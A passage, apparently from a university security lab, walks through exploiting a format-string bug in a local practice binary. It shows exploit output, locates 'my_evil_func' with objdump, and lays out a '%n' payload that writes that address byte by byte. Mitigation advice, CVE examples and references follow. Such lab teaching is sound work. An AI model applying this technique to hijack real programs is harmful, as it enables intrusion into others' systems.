PIE (0x8048000) +[+] Starting local process './format': pid 29030 +[*] Switching to interactive mode +[*] Process './format' stopped with exit code 0 (pid 29030) +\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... +This is the most useless and insecure program! 
+``` + +The output starts with `\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018` which are the 4 addresses we have written (raw, little endian) followed by the numerical prints done with `%x` of the same addresses. + +If you have the same output it means that now, if you replace `%x` with `%n` (change `fmt = write_fmt` in the script) it will try to write something at those valid addresses. + +We want to put the value `0x080491a6`. + +```console +$ objdump -d ./format | grep my_evil +080491a6 <my_evil_func>: +``` + +As `%n` writes how many characters have been printed until it is reached, each `%n` will write an incrementally larger value. +We use the 4 adjacent addresses to write byte by byte and use overflows to reach a lower value for the next byte. +For example, after writing `0xa6` we can write `0x0191`: + +![](https://ocw.cs.pub.ro/courses/_media/cns/labs/bytes_write.png) + +Also, the `%n` count doesn't reset so, if we want to write `0xa6` and then `0x91` the payload should be in the form of `<0xa6 bytes>%n<0x100 - 0xa6 + 0x91 bytes>%n`. + +As mentioned earlier, instead of writing N bytes as `"A" * N` you can use other format strings like `%Nc` or `%Nx` to keep the payload shorter. + +**Bonus task** Can you get a shell? +(Assume ASLR is disabled). + +#### Mitigation and Recommendations + +1. Manage the string length carefully +1. Don't use `gets`. + With `gets` there is no way of limiting how much data is read +1. Use string functions that take a size parameter whenever a non-constant string is involved, e.g. `snprintf`, `strncat`. +1. Make sure that the `NUL` byte is added; for instance, `strncpy` does **not** add a `NUL` byte when the source does not fit within the given size. +1. Use `wcs*` functions when dealing with wide char strings. +1. Don't trust the user! + +#### Real life Examples + +- [Heartbleed](http://xkcd.com/1354/) + Linux kernel through 3.9.4 [CVE-2013-2851](http://www.cvedetails.com/cve/CVE-2013-2851/) + The fix is [here](http://marc.info/?l=linux-kernel&m=137055204522556&w=2). 
+ More details [here](http://www.intelligentexploit.com/view-details-ascii.html?id=16609). + +- Windows 7 [CVE-2012-1851](http://www.cvedetails.com/cve/CVE-2012-1851/) + +- Pidgin off the record plugin [CVE-2012-2369](http://www.cvedetails.com/cve/CVE-2012-2369). + The fix is [here](https://bugzilla.novell.com/show_bug.cgi?id=762498#c1) + +### Resources + +- [Secure Coding in C and C++](http://www.cert.org/books/secure-coding/) +- [String representation in C](http://www.informit.com/articles/article.aspx?p=2036582) +- [Improper string length checking](https://www.owasp.org/index.php/Improper_string_length_checking) +- [Format String definition](http://cwe.mitre.org/data/definitions/134.html) +- [Format String Attack (OWASP)](https://www.owasp.org/index.php/Format_string_attack) +- [Format String Attack (webappsec)](http://projects.webappsec.org/w/page/13246926/Format%20String) +- [strlcpy and strlcat - consistent, safe, string copy and concatenation.](http://www.gratisoft.us/todd/papers/strlcpy.html): This resource is useful to understand some of the string manipulation problems.